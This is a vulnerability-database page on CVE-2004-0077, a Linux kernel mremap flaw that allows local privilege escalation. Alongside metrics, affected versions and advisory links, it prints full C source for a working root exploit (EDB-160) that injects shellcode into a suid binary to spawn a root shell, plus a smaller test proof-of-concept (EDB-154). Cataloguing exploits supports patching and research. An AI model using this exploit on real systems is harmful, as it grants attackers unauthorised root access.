CVE-2004-0077 : Detail

CVE-2004-0077

0.11%V4
Local
2004-09-01
02h00 +00:00
2011-07-16
22h00 +00:00

CVE Descriptions

The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE against that of all others.

Exploit information

Exploit Database EDB-ID : 160

Publication date : 2004-02-29 23h00 +00:00
Author : Paul Starzetz
EDB Verified : Yes

/* * * mremap missing do_munmap return check kernel exploit * * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte * ./mremap_pte [suid] [[shell]] * * Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2 * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <syscall.h> #include <signal.h> #include <time.h> #include <sched.h> #include <sys/mman.h> #include <sys/wait.h> #include <sys/utsname.h> #include <asm/page.h> #define str(s) #s #define xstr(s) str(s) // this is for standard kernels with 3/1 split #define STARTADDR 0x40000000 #define PGD_SIZE (PAGE_SIZE * 1024) #define VICTIM (STARTADDR + PGD_SIZE) #define MMAP_BASE (STARTADDR + 3*PGD_SIZE) #define DSIGNAL SIGCHLD #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM) #define MREMAP_MAYMOVE ( (1UL) << 0 ) #define MREMAP_FIXED ( (1UL) << 1 ) #define __NR_sys_mremap __NR_mremap // how many ld.so pages? 
this is the .text section length (like cat // /proc/self/maps) in pages #define LINKERPAGES 0x14 // suid victim static char *suid="/bin/ping"; // shell to start static char *launch="/bin/bash"; _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); static volatile unsigned base, *t, cnt, old_esp, prot, victim=0; static int i, pid=0; static char *env[2], *argv[2]; static ulong ret; // code to appear inside the suid image static void suid_code(void) { __asm__( " call callme \n" // setresuid(0, 0, 0), setresgid(0, 0, 0) "jumpme: xorl %ebx, %ebx \n" " xorl %ecx, %ecx \n" " xorl %edx, %edx \n" " xorl %eax, %eax \n" " mov $"xstr(__NR_setresuid)", %al \n" " int $0x80 \n" " mov $"xstr(__NR_setresgid)", %al \n" " int $0x80 \n" // execve(launch) " popl %ebx \n" " andl $0xfffff000, %ebx \n" " xorl %eax, %eax \n" " pushl %eax \n" " movl %esp, %edx \n" " pushl %ebx \n" " movl %esp, %ecx \n" " mov $"xstr(__NR_execve)", %al \n" " int $0x80 \n" // exit " xorl %eax, %eax \n" " mov $"xstr(__NR_exit)", %al \n" " int $0x80 \n" "callme: jmp jumpme \n" ); } static int suid_code_end(int v) { return v+1; } static inline void get_esp(void) { __asm__( " movl %%esp, %%eax \n" " andl $0xfffff000, %%eax \n" " movl %%eax, %0 \n" : : "m"(old_esp) ); } static inline void cloneme(void) { __asm__( " pusha \n" " movl $("xstr(CLONEFL)"), %%ebx \n" " movl %%esp, %%ecx \n" " movl $"xstr(__NR_clone)", %%eax \n" " int $0x80 \n" " movl %%eax, %0 \n" " popa \n" : : "m"(pid) ); } static inline void my_execve(void) { __asm__( " movl %1, %%ebx \n" " movl %2, %%ecx \n" " movl %3, %%edx \n" " movl $"xstr(__NR_execve)", %%eax \n" " int $0x80 \n" : "=a"(ret) : "m"(suid), "m"(argv), "m"(env) ); } static inline void pte_populate(unsigned addr) { unsigned r; char *ptr; memset((void*)addr, 0x90, PAGE_SIZE); r = ((unsigned)suid_code_end) - 
((unsigned)suid_code); ptr = (void*) (addr + PAGE_SIZE); ptr -= r+1; memcpy(ptr, suid_code, r); memcpy((void*)addr, launch, strlen(launch)+1); } // hit VMA limit & populate PTEs static void exhaust(void) { // mmap PTE donor t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; // prepare shell code pages for(i=2; i<LINKERPAGES+1; i++) pte_populate(victim + PAGE_SIZE*i); i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ); if(i) goto failed; // lock unmap base = MMAP_BASE; cnt = 0; prot = PROT_READ; printf("\n"); fflush(stdout); for(;;) { t = mmap((void*)base, PAGE_SIZE, prot, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) { if(ENOMEM==errno) break; else goto failed; } if( !(cnt%512) || cnt>65520 ) printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base, base+PAGE_SIZE); fflush(stdout); base += PAGE_SIZE; prot ^= PROT_EXEC; cnt++; } // move PTEs & populate page table cache ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM); if(-1==ret) goto failed; munmap((void*)MMAP_BASE, old_esp-MMAP_BASE); t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; *t = *((unsigned *)old_esp); munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE)); printf("\n[+] Success\n\n"); fflush(stdout); return; failed: printf("\n[-] Failed\n"); fflush(stdout); _exit(0); } static inline void check_kver(void) { static struct utsname un; int a=0, b=0, c=0, v=0, e=0, n; uname(&un); n=sscanf(un.release, "%d.%d.%d", &a, &b, &c); if(n!=3 || a!=2) { printf("\n[-] invalid kernel version string\n"); _exit(0); } if(b==2) { if(c<=25) v=1; } else if(b==3) { if(c<=99) v=1; } else if(b==4) { if(c>18 && c<=24) v=1, e=1; else if(c>24) v=0, e=0; else v=1, e=0; } else if(b==5 && c<=75) v=1, e=1; else if(b==6 && c<=2) v=1, e=1; printf("\n[+] 
kernel %s vulnerable: %s exploitable %s", un.release, v? "YES" : "NO", e? "YES" : "NO" ); fflush(stdout); if(v && e) return; _exit(0); } int main(int ac, char **av) { // prepare check_kver(); memset(env, 0, sizeof(env)); memset(argv, 0, sizeof(argv)); if(ac>1) suid=av[1]; if(ac>2) launch=av[2]; argv[0] = suid; get_esp(); // mmap & clone & execve exhaust(); cloneme(); if(!pid) { my_execve(); } else { waitpid(pid, 0, 0); } return 0; } // milw0rm.com [2004-03-01]
Exploit Database EDB-ID : 154

Publication date : 2004-02-17 23h00 +00:00
Author : Christophe Devine
EDB Verified : Yes

/* * Proof-of-concept exploit code for do_mremap() #2 * * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1". * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/ * * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not 
be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]

Products Mentioned

Configuration 0

Redhat>>Bigmem_kernel >> Version 2.4.20-8

    Redhat>>Kernel >> Version 2.4.20-8

      Redhat>>Kernel >> Version 2.4.20-8

        Redhat>>Kernel >> Version 2.4.20-8

          Redhat>>Kernel_doc >> Version 2.4.20-8

            Configuration 0

            Redhat>>Kernel_source >> Version 2.4.20-8

              Linux>>Linux_kernel >> Version 2.2.0

              Linux>>Linux_kernel >> Version 2.2.1

              Linux>>Linux_kernel >> Version 2.2.2

              Linux>>Linux_kernel >> Version 2.2.3

              Linux>>Linux_kernel >> Version 2.2.4

              Linux>>Linux_kernel >> Version 2.2.5

              Linux>>Linux_kernel >> Version 2.2.6

              Linux>>Linux_kernel >> Version 2.2.7

              Linux>>Linux_kernel >> Version 2.2.8

              Linux>>Linux_kernel >> Version 2.2.9

              Linux>>Linux_kernel >> Version 2.2.10

              Linux>>Linux_kernel >> Version 2.2.11

              Linux>>Linux_kernel >> Version 2.2.12

              Linux>>Linux_kernel >> Version 2.2.13

              Linux>>Linux_kernel >> Version 2.2.14

              Linux>>Linux_kernel >> Version 2.2.15

              Linux>>Linux_kernel >> Version 2.2.15

              Linux>>Linux_kernel >> Version 2.2.15_pre20

                Linux>>Linux_kernel >> Version 2.2.16

                Linux>>Linux_kernel >> Version 2.2.16

                Linux>>Linux_kernel >> Version 2.2.17

                Linux>>Linux_kernel >> Version 2.2.18

                Linux>>Linux_kernel >> Version 2.2.19

                Linux>>Linux_kernel >> Version 2.2.20

                Linux>>Linux_kernel >> Version 2.2.21

                Linux>>Linux_kernel >> Version 2.2.22

                Linux>>Linux_kernel >> Version 2.2.23

                Linux>>Linux_kernel >> Version 2.2.24

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.0

                Linux>>Linux_kernel >> Version 2.4.1

                Linux>>Linux_kernel >> Version 2.4.2

                Linux>>Linux_kernel >> Version 2.4.3

                Linux>>Linux_kernel >> Version 2.4.4

                Linux>>Linux_kernel >> Version 2.4.5

                Linux>>Linux_kernel >> Version 2.4.6

                Linux>>Linux_kernel >> Version 2.4.7

                Linux>>Linux_kernel >> Version 2.4.8

                Linux>>Linux_kernel >> Version 2.4.9

                Linux>>Linux_kernel >> Version 2.4.10

                Linux>>Linux_kernel >> Version 2.4.11

                Linux>>Linux_kernel >> Version 2.4.12

                Linux>>Linux_kernel >> Version 2.4.13

                Linux>>Linux_kernel >> Version 2.4.14

                Linux>>Linux_kernel >> Version 2.4.15

                Linux>>Linux_kernel >> Version 2.4.16

                Linux>>Linux_kernel >> Version 2.4.17

                Linux>>Linux_kernel >> Version 2.4.18

                Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.18

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.19

                  Linux>>Linux_kernel >> Version 2.4.20

                  Linux>>Linux_kernel >> Version 2.4.21

                  Linux>>Linux_kernel >> Version 2.4.21

                  Linux>>Linux_kernel >> Version 2.4.21

                  Linux>>Linux_kernel >> Version 2.4.21

                  Linux>>Linux_kernel >> Version 2.4.22

                  Linux>>Linux_kernel >> Version 2.4.23

                  Linux>>Linux_kernel >> Version 2.4.23

                  Linux>>Linux_kernel >> Version 2.4.24

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.0

                  Linux>>Linux_kernel >> Version 2.6.1

                  Linux>>Linux_kernel >> Version 2.6.1

                  Linux>>Linux_kernel >> Version 2.6.2

                  Linux>>Linux_kernel >> Version 2.6_test9_cvs

                    Netwosix>>Netwosix_linux >> Version 1.0

                      Trustix>>Secure_linux >> Version 1.5

                      Trustix>>Secure_linux >> Version 2.0

                      Redhat>>Kernel >> Version 2.4.20-8

                        Redhat>>Kernel >> Version 2.4.20-8

                          Redhat>>Kernel >> Version 2.4.20-8

                            References

                            http://www.debian.org/security/2004/dsa-450
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.debian.org/security/2004/dsa-440
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.redhat.com/support/errata/RHSA-2004-069.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.ciac.org/ciac/bulletins/o-082.shtml
                            Tags : third-party-advisory, government-resource, x_refsource_CIAC
                            http://fedoranews.org/updates/FEDORA-2004-079.shtml
                            Tags : vendor-advisory, x_refsource_FEDORA
                            http://www.debian.org/security/2004/dsa-439
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.debian.org/security/2004/dsa-475
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000820
                            Tags : vendor-advisory, x_refsource_CONECTIVA
                            http://www.redhat.com/support/errata/RHSA-2004-106.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.debian.org/security/2004/dsa-442
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.redhat.com/support/errata/RHSA-2004-065.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.debian.org/security/2004/dsa-470
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.securityfocus.com/bid/9686
                            Tags : vdb-entry, x_refsource_BID
                            http://www.debian.org/security/2004/dsa-438
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.debian.org/security/2004/dsa-514
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.debian.org/security/2004/dsa-456
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://security.gentoo.org/glsa/glsa-200403-02.xml
                            Tags : vendor-advisory, x_refsource_GENTOO
                            http://www.debian.org/security/2004/dsa-441
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.debian.org/security/2004/dsa-454
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://marc.info/?l=bugtraq&m=107711762014175&w=2
                            Tags : mailing-list, x_refsource_BUGTRAQ
                            http://www.debian.org/security/2004/dsa-444
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.redhat.com/support/errata/RHSA-2004-066.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://marc.info/?l=bugtraq&m=107755871932680&w=2
                            Tags : vendor-advisory, x_refsource_TRUSTIX
                            http://www.debian.org/security/2004/dsa-453
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://www.osvdb.org/3986
                            Tags : vdb-entry, x_refsource_OSVDB
                            http://www.kb.cert.org/vuls/id/981222
                            Tags : third-party-advisory, x_refsource_CERT-VN
                            http://www.debian.org/security/2004/dsa-466
                            Tags : vendor-advisory, x_refsource_DEBIAN
                            http://marc.info/?l=bugtraq&m=107712137732553&w=2
                            Tags : vendor-advisory, x_refsource_TRUSTIX